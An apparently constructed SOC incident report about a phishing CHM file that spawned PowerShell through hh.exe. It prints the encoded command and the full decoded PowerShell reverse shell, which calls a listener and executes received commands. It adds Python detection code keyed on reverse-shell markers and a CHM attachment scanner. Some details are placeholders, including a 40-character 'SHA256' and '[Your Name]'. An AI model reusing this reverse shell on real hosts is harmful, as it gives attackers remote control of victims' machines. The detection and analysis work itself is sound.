Microsoft Defender Alert Details
Alert ID: MD-CHM-EXEC-1218-7842
Alert Time: 2024-03-09 16:30:45 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Compiled HTML File (CHM) Executing Suspicious Code”
MITRE ATT&CK: T1218.001 – System Binary Proxy Execution: Compiled HTML File
Alert Details:
Detection: CHM file executed with script that spawns PowerShell
Host: SALES-WS-023 (Sales Workstation)
User: mwilson@company.com (Mike Wilson, Sales Rep)
File: C:\Users\mwilson\Downloads\Help_Document.chm
Detection Time: 16:25 EST
Process Tree:
explorer.exe (PID: 2341)
    hh.exe (HTML Help executable) (PID: 4789)
        cmd.exe (PID: 4792)
            powershell.exe (PID: 4795)
                Command: powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==
CHM File Analysis:
File: Help_Document.chm
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Contains HTML with embedded JavaScript
JavaScript decodes and executes PowerShell command
Detection Logic:
hh.exe (legitimate CHM viewer) spawning cmd.exe and powershell.exe (unusual)
CHM file from Downloads folder (external source)
Encoded PowerShell command (reverse shell)
Pattern matches CHM-based execution bypass
SOC Investigation Process

Step                    Action                   Tools Used               Findings
1. Alert Validation     Verify Defender alert    Microsoft 365 Defender   Confirmed CHM execution with PowerShell
2. File Analysis        Analyze CHM file         Defender Sandbox         Malicious CHM with script to download Cobalt Strike
3. User Interview       Contact mwilson          Teams, Phone             User opened CHM from email attachment
4. Immediate Action     Terminate processes      Defender                 hh.exe, cmd.exe, powershell.exe killed
5. Email Investigation  Find source email        Proofpoint, Exchange     Email quarantined; attachment malicious
6. Account Remediation  Reset mwilson password   Azure AD, AD             Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-194
Summary: T1218.001 – Malicious CHM File Executes PowerShell Reverse Shell
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, chm, compiled-html-file, defender, phishing
Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Compiled HTML File (CHM) Executing Suspicious Code”.
Host: SALES-WS-023 (Sales, user mwilson).
File: C:\Users\mwilson\Downloads\Help_Document.chm.
Time: 2024-03-09 16:30 EST.
Technique: MITRE ATT&CK T1218.001 – System Binary Proxy Execution: Compiled HTML File.
2. Technical Analysis:
Attack Chain:
16:00 – User receives phishing email with “Help_Document.chm”
16:05 – User opens attachment (CHM file)
16:06 – hh.exe launches, loads CHM
16:07 – CHM contains JavaScript that executes PowerShell
16:08 – PowerShell connects to 192.168.34.56:443 (internal host used as a pivot; the external address 185.143.221[.]89 was identified from that host's logs)
16:25 – Defender detects
CHM Exploitation:
Method: CHM files are compiled HTML rendered by hh.exe with the MSHTML engine; embedded script (here JavaScript) or the HTML Help ActiveX “shortcut” object can launch arbitrary commands when a page is opened
hh.exe is a signed Microsoft binary under C:\Windows, so application allow-listing and reputation checks typically permit it
Bypass: The malicious command runs as a child of a trusted process, so only the parent/child relationship looks anomalous
PowerShell Command (decoded):
$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);   # connect out to the listener (internal host, TCP 443)
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};                                             # 64 KB receive buffer
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){                 # loop until the operator closes the socket
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );                                 # run whatever was received via Invoke-Expression
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';                         # append a fake prompt showing the working directory
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);                                # return command output to the operator
$stream.Flush()
};
$client.Close()
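To check the decode of the -EncodedCommand value and the process-chain logic from the Detection Logic section against this command, here is an added example; it is not part of the incident record and not a Defender feature. The Python below walks constructed process-creation events modelled on the alert's process tree, flags cmd.exe/powershell.exe that descend from hh.exe, pulls the CHM path from the hh.exe command line, decodes the payload (PowerShell accepts any unambiguous prefix of -EncodedCommand, so -e, -ec and -enc must be caught too) and marks reverse-shell indicators. The event records, the PPID of explorer.exe and the benign hh.exe with PID 5100 are assumptions.

```python
import base64
import binascii
import re
from typing import Optional

# -EncodedCommand payload exactly as recorded in the Defender alert.
ENCODED_B64 = (
    "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBO"
    "AGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYA"
    "OAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="
)

# Constructed process-creation events modelled on the alert's process tree
# (assumed PPID 1000 for explorer.exe); PID 5100 is an assumed benign hh.exe
# opening a vendor manual with no children, to show the rule stays quiet.
EVENTS = [
    {"pid": 2341, "ppid": 1000, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4789, "ppid": 2341, "image": "hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\mwilson\Downloads\Help_Document.chm'},
    {"pid": 4792, "ppid": 4789, "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -WindowStyle Hidden -EncodedCommand " + ENCODED_B64},
    {"pid": 4795, "ppid": 4792, "image": "powershell.exe",
     "cmdline": "powershell -WindowStyle Hidden -EncodedCommand " + ENCODED_B64},
    {"pid": 5100, "ppid": 2341, "image": "hh.exe",
     "cmdline": r'"C:\Windows\hh.exe" "C:\Program Files\SomeApp\manual.chm"'},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
REVERSE_SHELL_MARKERS = ("tcpclient", "getstream(", "iex ", "invoke-expression")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand (or any accepted
    prefix such as -e, -ec, -enc), or None if the command line has none."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lower().lstrip("-/")
        if flag[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def ancestors(events, pid):
    """Events from the process's parent up to the root (parent first)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    pid = by_pid[pid]["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def chm_path_from_cmdline(cmdline: str) -> Optional[str]:
    """Extract the .chm argument (quoted or bare) from an hh.exe command line."""
    m = re.search(r'"([^"]+\.chm)"|(\S+\.chm)', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def detect(events):
    """Flag cmd/powershell processes descended from hh.exe and enrich each hit
    with the CHM path, its origin folder, the decoded payload and shell markers."""
    findings = []
    for e in events:
        if e["image"].lower() not in SHELLS:
            continue
        lineage = ancestors(events, e["pid"])
        hh = next((a for a in lineage if a["image"].lower() == "hh.exe"), None)
        if hh is None:
            continue
        between = lineage[: lineage.index(hh)]  # processes between hh.exe and this one
        chain = [hh["image"]] + [a["image"] for a in reversed(between)] + [e["image"]]
        chm = chm_path_from_cmdline(hh["cmdline"])
        decoded = decode_encoded_command(e["cmdline"])
        low = (decoded or "").lower()
        findings.append({
            "pid": e["pid"],
            "chain": " -> ".join(chain),
            "chm_path": chm,
            "from_downloads": bool(chm) and "\\downloads\\" in chm.lower(),
            "decoded": decoded,
            "reverse_shell": any(marker in low for marker in REVERSE_SHELL_MARKERS),
        })
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Both cmd.exe (PID 4792) and powershell.exe (PID 4795) are reported because the rule keys on the hh.exe ancestor rather than on the direct parent; the benign hh.exe with no children produces nothing. The decoded string for PID 4795 is the first line of the reverse shell shown above, which is why the reverse_shell marker fires on TCPClient.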
Impact:
C2 connection established
Attacker had an interactive shell for ~20 minutes (16:08 C2 connection until the processes were terminated at 16:28)
3. Investigation Findings:
Timeline:
16:00 – Email received
16:05 – CHM opened
16:08 – C2 connection
16:25 – Alert
16:27 – SOC investigates
16:28 – Processes terminated
Indicators of Compromise (IoCs):
Files:
– Help_Document.chm (SHA256: a1b2c3d4…)
Network:
– C2: 192.168.34.56:443 (internal pivot)
– External: 185.143.221[.]89 (from other host logs)
Processes:
– hh.exe -> cmd.exe -> powershell.exe
4. Containment Actions:
Immediate Actions:
Terminated hh.exe, cmd.exe, powershell.exe.
Deleted CHM file.
Isolated host.
Reset user password.
Enforced MFA.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User opened malicious CHM attachment.
Contributing Factors:
CHM files allowed as email attachments.
No ASR rule blocking hh.exe child processes.
6. Business Impact:
Operational Impact: Sales workstation offline for 2 hours.
Data Exposure: System information only.
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Technical Controls Enhanced:
Blocked CHM attachments via email gateway.
Enabled ASR rule “Block executable content from email client and webmail”.
Enhanced monitoring for hh.exe spawning child processes.
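A gateway filter that blocks only the .chm extension is easy to sidestep by renaming the file or wrapping it in a zip, so the control above is stronger when it also identifies CHM by content. Here is an added example of that check; it is not the organisation's gateway configuration or any vendor's code. A CHM begins with an ITSF header (the “ITSF” magic, a version field, the header length and two fixed GUIDs), and the Python below recognises that header regardless of filename and recurses into zip attachments. The sample attachments, their names and the minimal 96-byte header used as test input are constructed for the example and would not open in hh.exe.

```python
import io
import struct
import uuid
import zipfile

CHM_MAGIC = b"ITSF"
# The two GUIDs that follow the fixed fields of every ITSF header, as documented
# in public CHM format notes; stored little-endian (Windows GUID layout).
ITSF_GUID1 = uuid.UUID("7C01FD10-7BAA-11D0-9E0C-00A0C922E6EC")
ITSF_GUID2 = uuid.UUID("7C01FD11-7BAA-11D0-9E0C-00A0C922E6EC")


def is_chm(data: bytes) -> bool:
    """Identify a CHM by its ITSF header rather than by file extension.
    Checking version, header length and GUID1 avoids matching anything that
    merely starts with the four magic bytes."""
    if len(data) < 0x38 or data[:4] != CHM_MAGIC:
        return False
    version, header_len = struct.unpack_from("<II", data, 4)
    return (version in (2, 3)
            and header_len in (0x58, 0x60)
            and data[0x18:0x28] == ITSF_GUID1.bytes_le)


def build_sample_chm_header() -> bytes:
    """Constructed minimal v3 ITSF header (96 bytes) used as test input only."""
    hdr = struct.pack("<4sIIIII", CHM_MAGIC, 3, 0x60, 1, 0, 0x0409)  # magic, version, header len, unknown, timestamp, language id
    hdr += ITSF_GUID1.bytes_le + ITSF_GUID2.bytes_le
    hdr += struct.pack("<QQQQ", 0x60, 0x18, 0x78, 0x1000)  # header section table: (offset, length) x 2
    hdr += struct.pack("<Q", 0x1078)  # v3 only: offset of content section 0
    return hdr + b"\0" * 0x18  # a little padding standing in for the file body


def scan_attachment(name: str, data: bytes, depth: int = 0) -> list:
    """Return (path, kind) findings: 'chm' for a CHM with its own extension,
    'chm-renamed' for a CHM hiding behind another one; zips are opened up to
    three levels deep so a CHM inside an archive is still caught."""
    findings = []
    if is_chm(data):
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        findings.append((name, "chm" if ext == "chm" else "chm-renamed"))
    if depth < 3 and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.infolist():
                if member.is_dir():
                    continue
                inner = scan_attachment(member.filename, zf.read(member), depth + 1)
                findings += [(f"{name}/{path}", kind) for path, kind in inner]
    return findings


def sample_attachments():
    """Constructed attachments: a plain CHM, the same CHM renamed to .pdf,
    a zip carrying a CHM, and a harmless text file."""
    chm = build_sample_chm_header()
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docs/readme.txt", "see help")
        zf.writestr("docs/Help_Document.chm", chm)
    return [
        ("Help_Document.chm", chm),
        ("Invoice_0309.pdf", chm),          # renamed to dodge an extension filter
        ("Help_Docs.zip", zbuf.getvalue()),
        ("notes.txt", b"plain text, nothing to see"),
    ]


def gateway_verdicts(attachments):
    """Map each attachment name to its findings; an empty list means pass."""
    return {name: scan_attachment(name, data) for name, data in attachments}


if __name__ == "__main__":
    for name, verdict in gateway_verdicts(sample_attachments()).items():
        print(name, "->", verdict or "clean")
```

Only the text file passes: the renamed CHM is caught by its header, and the archived one by recursing into the zip. The same is_chm check can be reused on the endpoint side to confirm a quarantined file's type before reading its sandbox report.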
8. Conclusion:
An attacker used a CHM file to execute a PowerShell reverse shell via hh.exe, a signed Windows binary. Defender detected the anomalous hh.exe -> cmd.exe -> powershell.exe chain, and the SOC terminated the processes within three minutes of the alert; the roughly twenty minutes between execution and termination is the window the attacker had on the host.
Closure Rationale: Malware terminated; host cleaned; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 17:30 EST